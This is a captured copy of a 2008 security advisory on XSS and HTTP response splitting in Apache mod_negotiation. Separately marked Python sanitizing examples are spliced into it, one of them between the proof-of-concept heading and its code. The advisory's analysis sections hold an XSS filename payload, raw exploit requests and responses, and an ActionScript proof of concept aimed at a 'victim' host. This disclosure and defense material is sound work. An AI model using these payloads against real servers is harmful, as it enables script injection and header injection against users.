Submitted URL: http://www.mindedsecurity.com/MSA01150108.html
Effective URL: https://mindedsecurity.com/advisories/msa01150108/
Submission: On December 23 via api from HU — Scanned from DE
#MSA01150108

Apache mod_negotiation XSS and HTTP Response Splitting

AFFECTED VERSIONS:

Apache <= 1.3.39
Apache <= 2.0.61
Apache <= 2.2.6

MINDED SECURITY REFERENCEID:

MSA01150108

CREDITS:

Discovered by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com

REFERENCE:

MSA01150108

SEVERITY:

Low/Medium

BACKGROUND

From the Apache mod_negotiation documentation:

Content negotiation, or more accurately content selection, is the selection of
the document that best matches the client's capabilities, from one of several
available documents. There are two implementations of this.
* A type map (a file with the handler type-map) which explicitly
lists the files containing the variants.
* A MultiViews search (enabled by the MultiViews Option), where the
server does an implicit filename pattern match, and chooses from
amongst the results.

SUMMARY

mod_negotiation does not sanitize filenames in the "406 Not Acceptable" response
and in the "300 Multiple Choices" message body.
This could lead to XSS if the name of the file is controlled by an attacker
(i.e. by previously uploading it).

Moreover, as the list of filenames is also sent, unsanitized, in the response
headers (the Alternates header), it could result in an HTTP Response Splitting
[1] issue if the name of the file contains '\n' (Line Feed).
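The precondition for both issues is a filename the attacker chooses. As an added example (not part of the advisory), the following Python shows the application-side control for that precondition: an upload handler that refuses, or rewrites, any filename that is not a plain ASCII stem with an allowlisted extension, so that none of the characters mod_negotiation later reflects (angle brackets, quotes, spaces, CR, LF) can reach its output. The extension allowlist, the helper names and the sample names are constructed for this example. Where MultiViews is not needed in an upload directory, turning it off there with Options -MultiViews removes the negotiation path altogether.

```python
"""Upload-side filename policy for a directory served with MultiViews.

Added example, not Minded Security or Apache code. The allowlist below is a
constructed choice for the example; a real handler would use its own.
"""
import re
import unicodedata

ALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif', 'pdf'}   # constructed allowlist
_SAFE_STEM = re.compile(r'^[A-Za-z0-9_-]{1,64}$')


def is_acceptable_filename(name):
    """Allowlist check: stem of [A-Za-z0-9_-], exactly one dot before an
    allowlisted extension. Every character the advisory relies on (<, >, quotes,
    spaces, CR, LF) fails this check, as does a name with no extension."""
    stem, dot, ext = name.rpartition('.')
    return (bool(dot)
            and _SAFE_STEM.match(stem) is not None
            and ext.lower() in ALLOWED_EXTENSIONS)


def sanitize_filename(name, fallback='upload'):
    """Map an arbitrary user-supplied name onto the allowlist instead of
    rejecting it: drop any path components, fold the stem to ASCII, replace
    every other character with '_', and lower-case the extension.
    Returns None when the extension is not allowlisted (the caller rejects)."""
    name = name.replace('\\', '/').rsplit('/', 1)[-1]        # basename only
    stem, dot, ext = name.rpartition('.')
    if not dot or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    stem = unicodedata.normalize('NFKD', stem).encode('ascii', 'ignore').decode()
    stem = re.sub(r'[^A-Za-z0-9_-]', '_', stem).strip('_')[:64] or fallback
    return '%s.%s' % (stem, ext.lower())


if __name__ == '__main__':
    # Constructed sample names modelled on the two cases in the advisory.
    for sample in ('<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg',
                   'junk\nHeader: Injected\nblah:.jpg',
                   'photo_01.jpg'):
        print(repr(sample), '->', is_acceptable_filename(sample), sanitize_filename(sample))
```

Rejecting is the stricter choice; rewriting keeps uploads working for ordinary users while guaranteeing that whatever reaches the filesystem, and therefore the Alternates header and the 406 body, is already safe to reflect.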

ANALYSIS

I. Cross Site Scripting

Let's suppose mod_negotiation is enabled and an attacker can upload a file
with an arbitrary name and any extension that maps to a MIME type.
For example, a legitimate JPEG file named:


<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg

Then, by requesting it without the extension, with the Accept header set to
image/jpeg; q=0 (so that no variant is acceptable), the server answers:

----------------------------------------------------

GET <img%20src=sa%20onerror=eval(document.location.hash.substr(1))> HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 15:43:11 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 610
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>
</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /<img src=sa onerror=eval(document.location.hash.substr(1))> could not be found on this server.</p>
Available variants:
<ul>
<li><a href="<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg"><img src=sa onerror=eval(document.location.hash.substr(1))>.jpg</a> , type image/jpeg</li>
</ul>
<hr>

-----------------------------------------------------


As can be seen, the filename is reflected without any sanitization, both in the
Alternates header and in the HTML body, leading to XSS.

II. Http Response Splitting

Using the same technique, HTTP Response Splitting can be triggered if there is
some way to set the name of the file to a value containing line feeds, such as
the following (the surrounding quotes are not part of the name):


'junk
Header: Injected
blah:.jpg'

Then, by requesting the URL-encoded file name, again without the extension:

------------------------------------------------------
GET /junk%0aHeader:%20Injected%0ablah: HTTP/1.1
Host: 127.0.0.1
Accept: image/jpeg; q=0

HTTP/1.1 406 Not Acceptable
Date: Tue, 15 Jan 2008 16:06:52 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Alternates: {"junk
Header: Injected <----- Here!
blah:.jpg" 1 {type image/jpeg} {length 2}}
Vary: negotiate
TCN: list
Content-Length: 508
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>406 Not Acceptable</title>

</head><body>
<h1>Not Acceptable</h1>
<p>An appropriate representation of the requested resource /junk
Header: Injected
blah: could not be found on this server.</p>
Available variants:
<ul>
<li><a href="junk
Header: Injected
blah:.jpg">junk
Header: Injected
blah:.jpg</a> , type image/jpeg</li>

</ul>
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at 127.0.0.1 Port
80</address>
</body></html>

------------------------------------------------------


As can be seen, the response headers are split and "Header: Injected" is
indeed injected as a header of its own.

Proof of Concept
The following ActionScript can be used to trigger the XSS.
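The two cases above (the reflected filename in the body, and the line feed in the Alternates header) come from the same missing step: the variant name is concatenated into the header and into the HTML without any encoding. The following Python, added here as an illustration and not Apache or Minded Security code, simulates the 406 "Available variants" output both ways: the unsanitized concatenation the advisory shows, and a hardened form that percent-encodes the name where it is a header token or an href and HTML-escapes it where it is text. A small "Name: value" parser stands in for a proxy or browser, to show which headers a downstream consumer would attribute to the server in each case. The variant names and all function names are constructed for the example.

```python
"""Simulated 406 'Available variants' rendering: unsanitized vs. hardened.

Added example, not Apache code; the rendering functions only imitate the
shape of the output shown in the advisory.
"""
import html
from urllib.parse import quote

# Constructed variant names modelled on the two cases in the advisory.
XSS_NAME = '<img src=sa onerror=eval(document.location.hash.substr(1))>.jpg'
SPLIT_NAME = 'junk\nHeader: Injected\nblah:.jpg'


def alternates_unsanitized(variants):
    """Alternates value built the way the advisory shows: the name is quoted
    as-is, so a LF inside it becomes a line break inside the header block."""
    entries = ['{"%s" 1 {type %s} {length %d}}' % v for v in variants]
    return 'Alternates: ' + ', '.join(entries)


def alternates_hardened(variants):
    """Percent-encode the variant name (safe='' also encodes '/', ':' and '"')
    so it is a single token with no CR, LF or quote; the control-character
    check is defensive, since quote() already encodes them."""
    entries = []
    for name, ctype, length in variants:
        entry = '{"%s" 1 {type %s} {length %d}}' % (quote(name, safe=''), ctype, length)
        if any(ord(c) < 0x20 or c == '\x7f' for c in entry):
            raise ValueError('control character in header value')
        entries.append(entry)
    return 'Alternates: ' + ', '.join(entries)


def body_unsanitized(path, variants):
    """HTML body with the path and names concatenated raw (the vulnerable form)."""
    items = ''.join('<li><a href="%s">%s</a> , type %s</li>\n' % (n, n, t)
                    for n, t, _ in variants)
    return ('<p>An appropriate representation of the requested resource /%s '
            'could not be found on this server.</p>\n'
            'Available variants:\n<ul>\n%s</ul>\n' % (path, items))


def body_hardened(path, variants):
    """Same body: percent-encoding inside href, HTML escaping for text nodes."""
    items = ''.join('<li><a href="%s">%s</a> , type %s</li>\n'
                    % (quote(n, safe=''), html.escape(n, quote=True), html.escape(t))
                    for n, t, _ in variants)
    return ('<p>An appropriate representation of the requested resource /%s '
            'could not be found on this server.</p>\n'
            'Available variants:\n<ul>\n%s</ul>\n' % (html.escape(path), items))


def parse_header_block(block):
    """Naive 'Name: value' parser standing in for a proxy or browser: returns
    the headers a downstream consumer would believe the server sent."""
    headers = []
    for line in block.split('\n'):
        name, sep, value = line.partition(':')
        if sep and name and ' ' not in name:
            headers.append((name, value.strip()))
    return headers


if __name__ == '__main__':
    split_variant = [(SPLIT_NAME, 'image/jpeg', 2)]
    print(parse_header_block(alternates_unsanitized(split_variant)))
    print(parse_header_block(alternates_hardened(split_variant)))
    print(body_hardened('x', [(XSS_NAME, 'image/jpeg', 2)]))
```

The parser output is the practical point: with the unsanitized header the consumer sees a separate "Header: Injected" entry, with the hardened one it sees a single Alternates header whose value still identifies the variant, so encoding on output costs nothing in functionality.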


----------------------------------------------------------
// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
// Compile with the Flex compiler
package
{
    import flash.display.Sprite;
    import flash.net.*;

    public class TestXss extends Sprite {
        public function TestXss() {
            // Request the uploaded file name without its extension; the fragment
            // is what the reflected onerror handler reads from document.location.hash
            var r:URLRequest = new URLRequest('http://victim/<img%20src=sa%20onerror=eval(document.location.hash.substr(1))>#alert(123)');

            r.method = 'POST';
            r.data = unescape('test');
            // Accept header that makes no variant acceptable, so the 406 page is returned
            r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));

            navigateToURL(r, '_self');
        }
    }
}
----------------------------------------------------------


CREDITS

Stefano Di Paola is credited with the discovery of this vulnerability.

Disclosure Timeline
15/01/2008 Initial vendor notification
16/01/2008 Vendor Confirmed
21/01/2008 Coordinated public disclosure
22/01/2008 Minded Security Research Lab Advisory

REFERENCE

[1] "Divide and Conquer, HTTP Response Splitting, Web Cache Poisoning Attacks,
and Related Topics", Amit Klein, March 2004.
http://packetstormsecurity.org/papers/general/whit…

DISCLAIMER

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information.

Any use of this information is at the user's own risk. Permission is hereby
granted for the redistribution of this Alert electronically. It is not to be
edited in any way without express consent of Minded Security Research Lab. If
you wish to reprint the whole or any part of this Alert in any other medium
excluding electronic medium, please e-mail research_at_mindedsecurity.com for
permission.
